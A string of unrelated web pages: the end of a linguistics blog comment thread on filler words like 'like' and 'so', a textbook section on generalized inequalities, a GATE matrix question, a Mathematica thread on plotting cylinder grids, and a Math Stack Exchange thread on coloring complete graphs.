And we could go on to look at other common fillers like "you know", "I mean", "so", "well"; at less common fillers like "right?"; at repetitions like "and- and- and" or "I- I- I"; at painfully long silences; and so forth. ] 15. ### David Morris said, November 27, 2015 @ 5:41 am A few months ago I watched the first part of a talk by Stephen Fry in the Sydney Opera House (thinks: I must watch the end of that). He alternated between spontaneous sections about his impressions of Sydney and what he'd done there on this trip, and 'set pieces' (for the want of a better word) about his road to university, meeting Hugh Laurie, their first work in comedy, reflections on comedy or language – material which he's obviously written or spoken about (perhaps many times) before. It was very noticeable that the rate of fillers, hesitations, false starts, backtracking and recasting etc, was much higher during the spontaneous sections than the set ones. I think that the seeming growth in fillers, etc is due to the fact that, in the past, we generally only (or more) heard 'professional' speakers speaking (relatively) prepared material.
Now, with technology including the internet, we can hear just about anyone, speaking just about anytime. As I was typing this, I was subvocalising (and occasionally actually vocalising) my thoughts. I noticed that my (sub)vocalisations included ums and ahs which obviously do not show up in the written version. [(myl) Excellent points. I'd add that people who notice a vocal habit that's different from theirs, and is associated with others whom they're disposed to resent, will tend (in perception and memory) to exaggerate its frequency relative to analogous habits that they find more familiar and comfortable.] 16. ### Geoff said, November 27, 2015 @ 7:38 am Remember that fillers, by slowing things down, not only help the speaker to gather their thoughts, they also help the listener to keep up. The concise and elegant speech of a practised lecturer may look nice in the written paper, but it's not necessarily most helpful for live listeners. 17. ### joanne salton said, November 27, 2015 @ 8:02 am People often comment negatively on "like" in particular – can you think of a comparable historical example where a filler became an object of cross-generational conflict? Gore Vidal once claimed to be the last man alive who spoke in complete grammatical sentences. Perhaps he was the last man who wished to? 18. ### Richard Krummerich said, November 27, 2015 @ 10:04 am The first character I remember saying "like" was Maynard G. Krebs, the Bob Denver role in The Lives and Loves of Dobie Gillis. [(myl) From page 4 of Kerouac's On the Road (1957) — Dean Moriarty says: “Man, wow, there’s so many things to do, so many things to write! How to even begin to get it all down and without modified restraints and all hung-up on like literary inhibitions and grammatical fears . . .” The Dobie Gillis TV series started in 1959, which is later, but the Max Shulman "Dobie Gillis" short stories started coming out in 1945, so maybe they have priority.
Anyhow the adverbial/discourse-particle uses of like were certainly associated with stereotypical beat-generation lingo.] 19. ### January First-of-May said, November 27, 2015 @ 5:15 pm I don't know how, but this particular filler (and/or its "quotative" sense) had somehow managed to infiltrate even my English (at least, its spoken version) – even though I'm pretty sure it shouldn't have come up much in anything used in my education, both formal and informal (except perhaps the occasional internet text – but even online, people don't use that sort of stuff in writing anywhere near as often as in speech). That said, I probably just caught it somewhere on YouTube (and/or when talking to some American that I happened to meet). 20. ### Ken Miner said, November 28, 2015 @ 3:43 am You can find 'like' in US Spanish: "cuando tenia como 19 años expuse unos dibujos en una muestra colectiva" ("When I was like 19 years old I exposed some drawings in a group show"). (http://www.taringa.net/leodookie/mi/q0Zsi) Don't think anybody has explored this. 21. ### John Walden said, November 28, 2015 @ 5:23 am It certainly gets used in BrE, and for all I know elsewhere, as a way of reporting speech. Though perhaps to paraphrase and not be as verbatim as I said/he said might be: "And he's like: Will you help me? And I'm like: No way! And he's like:Why not?" "I'm kinda: I'm not sure" and "I go: Because I haven't got time" sound much the same. And asking to be shot down by pesky details like statistics and facts, I'd say that "I'm like:………" does sound a bit Brit Girl. 22. ### Ray said, November 28, 2015 @ 6:17 am I’ve noticed of late that teevee pundits and experts and celebrities will use “so…” to begin their answer, usually to a serious, complex question that involves a serious, complex explanation or summary. it always strikes me as endearingly informal and conversational, like an adult who’s borrowing from their adolescent speech style, but trying to sound more adult. 
It’s like, “so” is a brief filler/pause, while also expressing “I hear what you’re asking but I also want to signal that we need to back up so I can explain the larger premise of your question and the context of my answer." 23. ### Thomas Leslie said, November 28, 2015 @ 10:02 am @ Ken Miner, I wonder whether that "como" is just a way to signal an approximation (i.e. "When I was about 19 years old I presented…") rather than a quotative/filler a la English "like"? Claudia Holguín Mendoza out of U. of Oregon has done some work on, like, a number of Mexican Spanish quotatives and discourse particles which are similar to English "like" and "be+like". Check out her chapter "Pragmatic functions and cultural communicative needs in the use of innovative quotatives among Mexican bilingual youth" in Sociolinguistic Change Across the Spanish-speaking World : Case Studies in Honor of Anna Maria Escobar (2015). Should be accessible in digital form. 24. ### Ken Miner said, November 28, 2015 @ 10:17 am @ Ray Totally cool! I thought I was the only one in the world who noticed this new use of "so". I've been calling it "introductory 'so'". It's nearly as widespread in the US now as the "double copula" (on which Wikipedia now has an article). 25. ### Bloix said, November 28, 2015 @ 10:58 am Geoff Nunberg of this very blog did a commentary on NPR on introductory so a couple of months ago. http://www.npr.org/2015/09/03/432732859/so-whats-the-big-deal-with-starting-a-sentence-with-so To me, it seems like a substitution for well, which seems to have fallen back as a way to start a sentence. Well feels slower and older than so. 
[(myl) In this limited set of 10 interviews, the ratio of SO/WELL does seem to increase with increasing year of birth: ] Like seems to have originated, not as filler, but as a word with actual meaning – either "for example," as in the Kerouac excerpt Mark quotes in response to Richard Krummerich, above, or with the related meaning "more or less, approximately," as in "he was like 19 when it happened," to paraphrase Ken Miner's example. It may have been an abbreviated form of "things like" or "something like". [(myl) There's good reason to believe that ALL fillers — including UM and UH — have "actual meaning".] 26. ### Ray said, November 28, 2015 @ 12:23 pm @Bloix thanks for the link! — the article describes perfectly how I've been hearing the "so" thing. I think the "so" thing also seems on the rise among the explaining classes in the media because of an increasing awareness that the questions themselves are so often posed, in such public arenas, as contentious statements, and so there's a need to 1) acknowledge that and 2) frame that before 3) responding to that. (I think "like" is also a kind of defensive thing. and so maybe these fillers are really about power dynamics?) 27. ### Rebecca said, November 28, 2015 @ 12:29 pm Speaking of the "so" filler to begin answers, I find the explanation-ending "so…yeah" very interesting. Among its many uses, 11 year olds find it useful when reporting misbehaviour (either their own or a colleague's) and find it prudent to let some details be inferred by the listener (me). But it's common enough to have its own blog and facebook page. I would so love to hear a tv pundit use this. By now, surely, someone has. 28. ### Rodger C said, November 28, 2015 @ 12:40 pm So. The Spear-Danes in days gone by And the kings who ruled them had courage and greatness. We have heard of those princes’ heroic campaigns. 29. ### Jenny Chu said, November 29, 2015 @ 9:26 pm Two (unrelated) thoughts on this: 1.
In the book "Drifters" by James Michener, published in 1971 and set in 1969, the narrator goes on a rant about an 18-year-old character using "like" all the time (especially in conjunction with "wow", as in "I mean, like wow!"). So is it a language change? Or is it a flexible age marker? I am 42 and use "like" a lot less than I used to when I was, like, 16. [(myl) That's always a question about age-graded phenomena. In this case, at least, we can be sure that English-speaking young people didn't characteristically use discourse-particle like a couple of hundred years ago — think Huckleberry Finn. And even in 1950, like doesn't seem to have been widespread in the general population — think The Catcher in the Rye as opposed to On the Road.] 2. From a course in Old Church Slavonic long ago, I vaguely remember that there is a construction in which one can use "byl jako" (or something similar) to introduce a quote. Like, "And Jesus, to his disciples, was like, 'Come follow me.'" Any Slavic philologists around who can confirm or refute this? 30. ### Terry Hunt said, November 30, 2015 @ 11:13 am @ Roger C Hwaet's that you say? 31. ### Barbara Phillips Long said, December 1, 2015 @ 12:08 am @ Ken Miner — I often do pause when speaking, and sometimes I get interrupted at that point. I am not particularly offended by this, since I struggle to prevent myself from interrupting others. I think using fillers can signal that there's more to come and help stave off interruptions. In general, my experience is that some people speak fluently in public and some don't. Some professors I had (early 1970s) delivered very showy lectures, and others stuttered and stammered and used fillers and sometimes even failed to make the point they had intended to. 
I experienced excellent and dreadful lectures from professors in both English and linguistics, had a philosophy professor who appeared to have stage fright, and struggled to pay attention to a computer science professor who said "uh" so often that I started counting the number of "uhs" then during subsequent lectures had quite a bit of trouble focusing on content rather than fillers.
https://tisp.indigits.com/convex_sets/generalized_inequality.html
# 9.7. Generalized Inequalities# A proper cone $$K$$ can be used to define a generalized inequality, which is a partial ordering on $$\RR^n$$. Definition 9.38 Let $$K \subseteq \RR^n$$ be a proper cone. A partial ordering on $$\RR^n$$ associated with the proper cone $$K$$ is defined as $x \preceq_{K} y \iff y - x \in K.$ We also write $$x \succeq_K y$$ if $$y \preceq_K x$$. This is also known as a generalized inequality. A strict partial ordering on $$\RR^n$$ associated with the proper cone $$K$$ is defined as $x \prec_{K} y \iff y - x \in \Interior{K}.$ where $$\Interior{K}$$ is the interior of $$K$$. We also write $$x \succ_K y$$ if $$y \prec_K x$$. This is also known as a strict generalized inequality. When $$K = \RR_+$$, then $$\preceq_K$$ is same as usual $$\leq$$ and $$\prec_K$$ is same as usual $$<$$ operators on $$\RR_+$$. Example 9.20 (Nonnegative orthant and component-wise inequality) The nonnegative orthant $$K=\RR_+^n$$ is a proper cone. Then the associated generalized inequality $$\preceq_{K}$$ means that $x \preceq_K y \implies (y-x) \in \RR_+^n \implies x_i \leq y_i \Forall i= 1,\dots,n.$ This is usually known as component-wise inequality and usually denoted as $$x \preceq y$$. Example 9.21 (Positive semidefinite cone and matrix inequality) The positive semidefinite cone $$S_+^n \subseteq S^n$$ is a proper cone in the vector space $$S^n$$. The associated generalized inequality means $X \preceq_{S_+^n} Y \implies Y - X \in S_+^n$ i.e. $$Y - X$$ is positive semidefinite. This is also usually denoted as $$X \preceq Y$$. ## 9.7.1. Minima and maxima# The generalized inequalities ($$\preceq_K, \prec_K$$) w.r.t. the proper cone $$K \subset \RR^n$$ define a partial ordering over any arbitrary set $$S \subseteq \RR^n$$. But since they may not enforce a total ordering on $$S$$, not every pair of elements $$x, y\in S$$ may be related by $$\preceq_K$$ or $$\prec_K$$. Example 9.22 (Partial ordering with nonnegative orthant cone) Let $$K = \RR^2_+ \subset \RR^2$$. 
Let $$x_1 = (2,3), x_2 = (4, 5), x_3=(-3, 5)$$. Then we have • $$x_1 \prec x_2$$, $$x_2 \succ x_1$$ and $$x_3 \preceq x_2$$. • But neither $$x_1 \preceq x_3$$ nor $$x_1 \succeq x_3$$ holds. • In general, for any $$x , y \in \RR^2$$, $$x \preceq y$$ if and only if $$y$$ is to the right of and above $$x$$ in the $$\RR^2$$ plane. • If $$y$$ is to the right but below, or $$y$$ is above but to the left of $$x$$, then no ordering holds. Definition 9.39 We say that $$x \in S \subseteq \RR^n$$ is the minimum element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if for every $$y \in S$$ we have $$x \preceq y$$. • $$x$$ must belong to $$S$$. • It is highly possible that there is no minimum element in $$S$$. • If a set $$S$$ has a minimum element, then by definition it is unique (Prove it!). Definition 9.40 We say that $$x \in S \subseteq \RR^n$$ is the maximum element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if for every $$y \in S$$ we have $$y \preceq x$$. • $$x$$ must belong to $$S$$. • It is highly possible that there is no maximum element in $$S$$. • If a set $$S$$ has a maximum element, then by definition it is unique. Example 9.23 (Minimum element) Consider $$K = \RR^n_+$$ and $$S = \RR^n_+$$. Then $$0 \in S$$ is the minimum element since $$0 \preceq x \Forall x \in \RR^n_+$$. Example 9.24 (Maximum element) Consider $$K = \RR^n_+$$ and $$S = \{x | x_i \leq 0 \Forall i=1,\dots,n\}$$. Then $$0 \in S$$ is the maximum element since $$x \preceq 0 \Forall x \in S$$. There are many sets for which no minimum element exists. In this context we can define a slightly weaker concept known as minimal element. Definition 9.41 An element $$x\in S$$ is called a minimal element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if there is no element $$y \in S$$ distinct from $$x$$ such that $$y \preceq_K x$$. In other words $$y \preceq_K x \implies y = x$$. Definition 9.42 An element $$x\in S$$ is called a maximal element of $$S$$ w.r.t.
the generalized inequality $$\preceq_K$$ if there is no element $$y \in S$$ distinct from $$x$$ such that $$x \preceq_K y$$. In other words $$x \preceq_K y \implies y = x$$. • The minimal or maximal element $$x$$ must belong to $$S$$. • It is highly possible that there is no minimal or maximal element in $$S$$. • Minimal or maximal element need not be unique. A set may have many minimal or maximal elements. Lemma 9.1 A point $$x \in S$$ is the minimum element of $$S$$ if and only if $S \subseteq x + K$ Proof. Let $$x \in S$$ be the minimum element. Then by definition $$x \preceq_K y \Forall y \in S$$. Thus $\begin{split} & y - x \in K \Forall y \in S \\ \implies & \text{ there exists some } k \in K \Forall y \in S \text{ such that } y = x + k\\ \implies & y \in x + K \Forall y \in S\\ \implies & S \subseteq x + K. \end{split}$ Note that $$k \in K$$ would be distinct for each $$y \in S$$. Now let us prove the converse. Let $$S \subseteq x + K$$ where $$x \in S$$. Thus $\begin{split} & \exists k \in K \text{ such that } y = x + k \Forall y \in S\\ \implies & y - x = k \in K \Forall y \in S\\ \implies & x \preceq_K y \Forall y \in S. \end{split}$ Thus $$x$$ is the minimum element of $$S$$ since there can be only one minimum element of S. $$x + K$$ denotes all the points that are comparable to $$x$$ and greater than or equal to $$x$$ according to $$\preceq_K$$. Lemma 9.2 A point $$x \in S$$ is a minimal point if and only if $\{ x - K \} \cap S = \{ x \}.$ Proof. Let $$x \in S$$ be a minimal element of $$S$$. Thus there is no element $$y \in S$$ distinct from $$x$$ such that $$y \preceq_K x$$. Consider the set $$R = x - K = \{x - k | k \in K \}$$. $r \in R \iff r = x - k \text { for some } k \in K \iff x - r \in K \iff r \preceq_K x.$ Thus $$x - K$$ consists of all points $$r \in \RR^n$$ which satisfy $$r \preceq_K x$$. But there is only one such point in $$S$$ namely $$x$$ which satisfies this. 
Hence $\{ x - K \} \cap S = \{ x \}.$ Now let us assume that $$\{ x - K \} \cap S = \{ x \}$$. Thus the only point $$y \in S$$ which satisfies $$y \preceq_K x$$ is $$x$$ itself. Hence $$x$$ is a minimal element of $$S$$. $$x - K$$ represents the set of points that are comparable to $$x$$ and are less than or equal to $$x$$ according to $$\preceq_K$$.
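The definitions above are easy to exercise numerically for the nonnegative-orthant cone $$K = \RR^n_+$$. The sketch below (illustrative, not part of the source text) checks the generalized inequality componentwise and distinguishes the minimum element from minimal elements:

```python
def leq_K(x, y):
    # x <=_K y w.r.t. K = R^n_+  iff  y - x in K, i.e. componentwise <=
    return all(xi <= yi for xi, yi in zip(x, y))

def minimum_element(S):
    # The minimum element (if it exists): below *every* element of S.
    # It is unique, so returning the first match is safe.
    for x in S:
        if all(leq_K(x, y) for y in S):
            return x
    return None  # some pair in S is incomparable below every candidate

def minimal_elements(S):
    # Minimal elements: no distinct y in S with y <=_K x.
    return [x for x in S
            if not any(y != x and leq_K(y, x) for y in S)]
```

With the points of Example 9.22, $$S = \{x_1, x_2, x_3\}$$ has no minimum element ($$x_1$$ and $$x_3$$ are incomparable), but both $$x_1 = (2,3)$$ and $$x_3 = (-3,5)$$ are minimal.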
https://ec.gateoverflow.in/863/gate-ece-2016-set-1-question-1
Let $M^4 = I$ (where $I$ denotes the identity matrix) and $M \neq I$, $M^2 \neq I$ and $M^3 \neq I$. Then, for any natural number $k$, $M^{-1}$ equals: 1. $M^{4k+1}$ 2. $M^{4k+2}$ 3. $M^{4k+3}$ 4. $M^{4k}$
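Since $M^4 = I$, we have $M^{4k} = I$ and hence $M \cdot M^{4k+3} = M^{4k+4} = I$, so $M^{-1} = M^{4k+3}$ (option 3). This can be sanity-checked numerically with a concrete matrix satisfying the hypotheses; the sketch below uses plain Python lists, no external libraries.

```python
# Check the claim with a concrete M satisfying the hypotheses: the
# 90-degree rotation matrix has M^4 = I while M, M^2, M^3 != I, so
# M^-1 = M^3 = M^(4k+3) for every natural k (because M^(4k) = I).

def matmul(A, B):
    return [[sum(A[i][k] * B[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]

def matpow(A, n):
    R = [[1, 0], [0, 1]]            # identity
    for _ in range(n):
        R = matmul(R, A)
    return R

I = [[1, 0], [0, 1]]
M = [[0, -1], [1, 0]]               # rotation by 90 degrees

assert matpow(M, 4) == I
assert all(matpow(M, p) != I for p in (1, 2, 3))
assert all(matmul(M, matpow(M, 4 * k + 3)) == I for k in range(4))
print("M^-1 = M^(4k+3)")
```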
https://mathematica.stackexchange.com/questions/238849/contourplot3d-grid-of-cylinders
# ContourPlot3D, grid of cylinders I am trying to make a 3D contour plot that looks like a grid of cylinders to represent the Fermi surface of a metal, like below: I have no problem generating something that kind of looks like it. (Cos[x] + Cos[y] + Cos[z] == 0). (This shows multiple unit cells.) I need it to be more cylindrical, though. I need to also later plot cross-sections of this for planes at different heights, so it is more than just wanting the accurate figure. I think this is tricky because it is not well-suited to either cylindrical coordinates or spherical coordinates. I was thinking that I could just create three cylinders at right angles to each other and superimpose them, but I can't figure out a way to make the equation for cylinders. Any help on this would be great! • Do you want real cylinders or "smoothed cylinders" like the approaches with Cos? Should the interior be hollow or filled? – A.Z. Jan 27 at 9:49 • The "real cylinders" approach would correspond to Michael's and my answer, while cvgmt's answer uses a nodal surface approximation. – J. M.'s ennui Jan 27 at 16:44 • Another approach would be to use Cylinder and RegionUnion to construct a single Region object – b3m2a1 Jan 27 at 17:49 • @J.M. I think that the nodal surface approximation is actually closer to the physical situation that I am modeling (Fermi surface), but your answer is also very useful. I can't seem, however, to make the cross-sections without there being little gaps in the circles using your approach (I think because of the Round[] function). – Nick Jan 27 at 18:26 • @Nick, are you using the current version in my answer? Indeed, the previous formulation of my answer had those artifacts, but I do not believe the current one does. – J. M.'s ennui Jan 27 at 18:35 Maybe add some perturbed term such as Cos[x]*Cos[y]*Cos[z] or Cos[x]*Cos[y]+Cos[y]*Cos[z]+Cos[z]*Cos[x] to Cos[x] + Cos[y] + Cos[z]. 
ContourPlot3D[ Cos[x] + Cos[y] + Cos[z] - 1.5 Cos[x] Cos[y] Cos[z] == 1.5, {x, -9, 9}, {y, -9, 9}, {z, -9, 9}, ContourStyle -> FaceForm[Orange, Cyan], Mesh -> None, Boxed -> False, Axes -> False] • This is exactly what I was thinking! – Nick Jan 27 at 3:17 cvgmt had the right idea to use a periodic function. Using a technique similar to what I did here, here is how to use Round[] (for periodicity) with Max[] (as a stand-in for Boolean OR): With[{c = 1, r = 1/4}, ContourPlot3D[Max[r^2 - (x - Round[x, c])^2 - (y - Round[y, c])^2, r^2 - (y - Round[y, c])^2 - (z - Round[z, c])^2, r^2 - (z - Round[z, c])^2 - (x - Round[x, c])^2] == 0, {x, -3/2, 3/2}, {y, -3/2, 3/2}, {z, -3/2, 3/2}]] You'd need to be prepared to crank up PlotPoints and MaxRecursion for this approach (with the concomitant increase in memory requirements). A variation of this theme is to replace Max[] with a smooth version like $$\log$$-sum-$$\exp$$: With[{c = 1, r = 1/4, k = 30}, ContourPlot3D[Log[Total[ Exp[k {r^2 - (x - Round[x, c])^2 - (y - Round[y, c])^2, r^2 - (y - Round[y, c])^2 - (z - Round[z, c])^2, r^2 - (z - Round[z, c])^2 - (x - Round[x, c])^2}]]]/k == 0, {x, -3/2, 3/2}, {y, -3/2, 3/2}, {z, -3/2, 3/2}]] Maybe this is helpful ContourPlot3D[{ (x - 2)^2 + (y - 2)^2 == 1, (x + 2)^2 + (y - 2)^2 == 1, (x - 2)^2 + (y + 2)^2 == 1, (x + 2)^2 + (y + 2)^2 == 1, (x - 2)^2 + (z - 2)^2 == 1, (x + 2)^2 + (z - 2)^2 == 1, (x - 2)^2 + (z + 2)^2 == 1, (x + 2)^2 + (z + 2)^2 == 1, (y - 2)^2 + (z - 2)^2 == 1, (y + 2)^2 + (z - 2)^2 == 1, (y - 2)^2 + (z + 2)^2 == 1, (y + 2)^2 + (z + 2)^2 == 1 }, {x, -5, 5}, {y, -5, 5}, {z, -5, 5} ] There are probably cleverer ways to create the cylinders, depending on what you want to do with them. If this does not need to be a contour plot, have a look at the Cylinder[] function. • Is there a way to make the grid of cylinders into a single object? When I take cross-sections it treats them all as separate, but I need it to act like a unit. 
– Nick Jan 27 at 1:41 Another way, if you want cylinders: ddd = Min@Table[ RegionDistance[ InfiniteLine[{Insert[{a, b}, 0, j], Insert[{a, b}, 1, j]}]] [{x, y, z}], {a, -1, 1}, {b, -1, 1}, {j, 3} ]; ContourPlot3D[ddd == 1/4 // Evaluate, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}] Just to show how to do this without ContourPlot3D and instead with Region objects RegionUnion[ Sequence @@ Table[ RegionUnion[ Cylinder[{{-1, 0, n}, {1, 0, n}}, .2], Cylinder[{{0, -1, n}, {0, 1, n}}, .2] ] // Region, {n, -1, 1} ], Cylinder[{{0, 0, -2}, {0, 0, 2}}, .2] ] Or if you just want the boundary tubeboundary = RegionUnion[ Sequence @@ Table[ RegionUnion[ RegionBoundary@Cylinder[{{-1, 0, n}, {1, 0, n}}, .2], RegionBoundary@Cylinder[{{0, -1, n}, {0, 1, n}}, .2] ] // Region, {n, -1, 1} ], RegionBoundary@Cylinder[{{0, 0, -2}, {0, 0, 2}}, .2] ] and this allows you to get a function for the surface tubeboundary // RegionMember RegionMemberFunction[ BooleanRegion[#1 || #2 || #3 || #4 || #5 || #6 || #7 & , {RegionBoundary[ Cylinder[{{-1, 0, -1}, {1, 0, -1}}, 0.2]], RegionBoundary[Cylinder[{{0, -1, -1}, {0, 1, -1}}, 0.2]], RegionBoundary[Cylinder[{{-1, 0, 0}, {1, 0, 0}}, 0.2]], << 2 >>, RegionBoundary[Cylinder[{{<< 3 >>}, {<< 3 >>}}, 0.2]], RegionBoundary[Cylinder[{{0, 0, -2}, {0, 0, 2}}, 0.2]]}], <>] This can perhaps be generalized easily to other constraints. The equation of a cylinder in the z-direction can be written as a function that evaluates to zero. \begin{align} x^2+y^2&=r^2\\ f_Z(x,y,z)=x^2+y^2-r^2&=0 \end{align} So to get the union of three cylinders you just multiply three of these functions together (the product is zero exactly where at least one factor is zero): range = 3; r = 1; ContourPlot3D[ (x^2 + y^2 - r^2) (z^2 + y^2 - r^2) (z^2 + x^2 - r^2) == 0, {x, -range, range}, {y, -range, range}, {z, -range, range} ] The nice thing is you can easily smooth this out by taking a contour slightly above zero.
ContourPlot3D[ (x^2 + y^2 - r^2) (z^2 + y^2 - r^2) (z^2 + x^2 - r^2) == 0.05, {x, -range, range}, {y, -range, range}, {z, -range, range} ] You can make this periodic by replacing x -> Sin[x] (same for $$y,z$$) or by replacing x -> Mod[x, period, - period/2]. Sin[x] seems to work faster but you won't get perfect cylinders. range = 5; r = .5; ContourPlot3D[(Sin[x]^2 + Sin[y]^2 - r^2) (Sin[z]^2 + Sin[y]^2 - r^2) (Sin[x]^2 + Sin[z]^2 - r^2) == .005, {x, -range, range}, {y, -range, range}, {z, -range, range}] • In my answer, I originally used multiplication (AND) instead of Max[] (OR), but the resulting surface had blemishes for some reason, which is why I switched to the current formulation. – J. M.'s ennui Jan 28 at 1:40 • @J.M. Yes I think our answers nicely complement each other. – AccidentalTaylorExpansion Jan 28 at 10:44 So, one thing you can do here is note that the equation for the unit cylinder extending along the z-axis is $$x^2+y^2=1$$, or $$x^2+y^2\leq1$$ for a solid cylinder. That is, it's the equation for a circle that ignores one of the axes! The other two just choose different axes to ignore. As such RegionPlot3D[{x^2 + y^2 <= 1, y^2 + z^2 <= 1, z^2 + x^2 <= 1}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}] gets you the three cylinders: You can change the colors and styling with the options of RegionPlot3D: RegionPlot3D[{x^2 + y^2 <= 1, y^2 + z^2 <= 1, z^2 + x^2 <= 1}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}, PlotStyle -> {Directive[Magenta, Opacity[0.5]], Directive[Cyan, Opacity[0.5]], Directive[Yellow, Opacity[0.5]]}, Mesh -> False] Importantly, you can get cross sections by And-ing (&&) these conditions with the condition for being below a plane.
Consider the half-space given by $$x + y + z/2 \geq 0$$ (bounded by the plane $$x + y + z/2 = 0$$); we have RegionPlot3D[{x^2 + y^2 <= 1 && x + y + z/2 >= 0, y^2 + z^2 <= 1 && x + y + z/2 >= 0, z^2 + x^2 <= 1 && x + y + z/2 >= 0}, {x, -2, 2}, {y, -2, 2}, {z, -2, 2}, PlotStyle -> {Directive[Magenta, Opacity[0.5]], Directive[Cyan, Opacity[0.5]], Directive[Yellow, Opacity[0.5]]}, Mesh -> False, PlotPoints -> 100] Note that we also had to set PlotPoints to a higher number to get something that looks nice! You could make it even higher to make it look better. (Now, you might be wondering: how do I automate this to produce a grid? And is the Cylinder graphics primitive better? Maybe. I'll try to update this answer when I have a chance later!)
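The implicit conditions passed to RegionPlot3D can also be checked point-by-point outside Mathematica. Here is a minimal Python sketch (function names are illustrative) of the three-cylinder union and the half-space clip used for the cross-section above.

```python
# Membership tests for the union of the three unit cylinders
#   x^2 + y^2 <= 1,  y^2 + z^2 <= 1,  z^2 + x^2 <= 1
# optionally clipped by the half-space x + y + z/2 >= 0, mirroring the
# RegionPlot3D conditions. Function names are illustrative.

def in_cylinders(x, y, z):
    return (x*x + y*y <= 1) or (y*y + z*z <= 1) or (z*z + x*x <= 1)

def in_cross_section(x, y, z):
    return in_cylinders(x, y, z) and (x + y + z/2 >= 0)

print(in_cylinders(0, 0, 5), in_cylinders(2, 2, 2))            # True False
print(in_cross_section(0, 0, 5), in_cross_section(0, 0, -5))   # True False
```

A predicate like this is handy for sampling points on a lattice to approximate cross-sectional areas, independently of the plotting front end.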
https://math.stackexchange.com/questions/2619214/complete-graphs-in-the-plane-with-colored-edges-where-an-edge-dont-cross-edges
Complete graphs in the plane with colored edges where an edge doesn't cross edges of the same color The maximal number of nodes in a complete planar graph is $4$. Suppose that the edges of the graph can be chosen with $m$ different colors and that edges with different colors are allowed to cross each other. What would be the maximal number of nodes for a complete graph like this occurring in the plane with this rule? Below is the case with $2$ colors and $7$ nodes. I found this: layered graphs, and the results there don't contradict the conjecture that a complete graph with $4n$ vertices needs $n$ colors for the edges. • Interesting. For $m=2$ I can do $6$ nodes. Haven't tried $7$. Can you work out this case and edit your question to include the result? You could ask about bipartite graphs too. – Ethan Bolker Jan 24 '18 at 15:04 • @EthanBolker: For $m=2$ I did $7$ nodes by marking the nodes on both sides of a paper and writing edges on both sides. – Lehs Jan 24 '18 at 17:15 A planar graph on n vertices can have at most 3n-6 edges, and so we will need at least $\frac{\binom n2}{3n-6} = \frac{n+1}{6} + \frac{1}{3(n-2)}$ colors. In the other direction, when $n$ is odd, we can partition $K_n$ into $\frac{n-1}{2}$ Hamiltonian cycles, which are all planar. If we're allowed to curve the edges, we might embed these as follows (example for $K_9$). One cycle looks like: and the other three cycles are obtained by $45^\circ, 90^\circ, 135^\circ$ rotations of this one. Here is a picture of the full coloring, though there's rather a lot going on: The construction generalizes to any odd $n$, placing a single vertex in the center of a circle, the others around the perimeter, and zigzagging between them. Except for two edges out of the center and a single edge that would otherwise be a diameter, almost all the edges can be straight lines.
This gives us a coloring with $\frac{n-1}{2}$ colors; when $n$ is even, we can color $K_{n+1}$ with $\frac n2$ colors, then delete the center vertex to get a coloring of $K_n$. So the correct answer is on the order of $cn$ for some constant $c$ between $\frac16$ and $\frac12$. (If we can't curve the edges, I can't off-hand think of a better thing to do than to partition $K_n$ into $n-1$ perfect matchings for even $n$, which gives us $n-1$ rather than $\frac{n-1}{2}$ color classes.) • Note that even though Hamiltonian cycles are planar graphs, there's no guarantee that an arbitrary Hamiltonian cycle in an already-embedded plane graph will be noncrossing with respect to that particular embedding of the vertices. – Gregory J. Puleo Jan 24 '18 at 17:28 • @GregoryJ.Puleo True in general, but in this case it's possible; I guess I should elaborate on how. – Misha Lavrov Jan 24 '18 at 17:41 • I see your point. The illustration is very helpful! – Gregory J. Puleo Jan 24 '18 at 17:58 This isn't a complete answer, but the quantity you're asking for is closely related to the thickness of a graph, which is the minimum number of planar subgraphs which jointly cover the edges of the graph. It is known that the thickness of the complete graph $K_n$ is $\lfloor (n+7)/6 \rfloor$ except at $K_9$ and $K_{10}$. I believe that the concepts aren't exactly equivalent, because your framing of the question requires all the planar subgraphs to use the same positions for the vertices, while thickness does not require the same restriction. However, the thickness still gives a lower bound on the number of colors required, and it's possible that diving into the papers in the MathWorld article would show that the constructions involved do use the same positions for all the subgraphs (or could be modified in that way). • What difference could the positions of the vertices possibly make?
Unless you require the edges to be drawn as straight lines, but it's apparent from the OP's drawing that that's not a requirement. Given a set of $n$ distinct points $x_1,\dots,x_n,$ and another set of $n$ distinct points $y_1,\dots,y_n,$ there is a homeomorphism of the plane to itself mapping $x_i$ to $y_i$ for $i=1,\dots,n.$ – bof Jan 24 '18 at 20:25 • @bof I'm not particularly well-versed in topology per se, so I stuck to what I knew was true, and it wasn't immediately obvious to me that a planar graph can have its edges drawn in a noncrossing manner no matter how the vertices are placed into the plane. Based on what you're saying, it sounds like thickness might actually be the beginning and the end of the story here. – Gregory J. Puleo Jan 24 '18 at 23:03
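The Hamiltonian-cycle decomposition used in the first answer can be checked programmatically. The sketch below implements a Walecki-style construction (a hub vertex plus rotated zigzag cycles, which appears to be what the answer describes) and verifies that the $\frac{n-1}{2}$ cycles partition the edges of $K_n$ for odd $n$; the function name is illustrative.

```python
from itertools import combinations

# Walecki-style decomposition of K_n (n odd) into (n-1)/2 Hamiltonian
# cycles: a "zigzag" cycle through a hub vertex, plus rotations of it.
# This realizes the (n-1)/2-color upper bound discussed above.

def hamiltonian_decomposition(n):
    assert n % 2 == 1
    m = (n - 1) // 2
    hub = n - 1                      # vertices 0..n-2 on a circle, plus a hub
    zigzag = [0]
    for i in range(1, n - 1):        # 0, 1, -1, 2, -2, ... (mod n-1)
        step = (i + 1) // 2 if i % 2 else -(i // 2)
        zigzag.append(step % (n - 1))
    return [[hub] + [(v + j) % (n - 1) for v in zigzag] for j in range(m)]

n = 9
cycles = hamiltonian_decomposition(n)
edges = set()
for cyc in cycles:
    assert sorted(cyc) == list(range(n))      # each cycle is Hamiltonian
    for a, b in zip(cyc, cyc[1:] + cyc[:1]):
        e = frozenset((a, b))
        assert e not in edges                 # color classes are disjoint
        edges.add(e)
assert edges == {frozenset(e) for e in combinations(range(n), 2)}
print(len(cycles))  # (n-1)/2 = 4 cycles covering all C(9,2) = 36 edges
```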
http://physics.aps.org/articles/v4/93
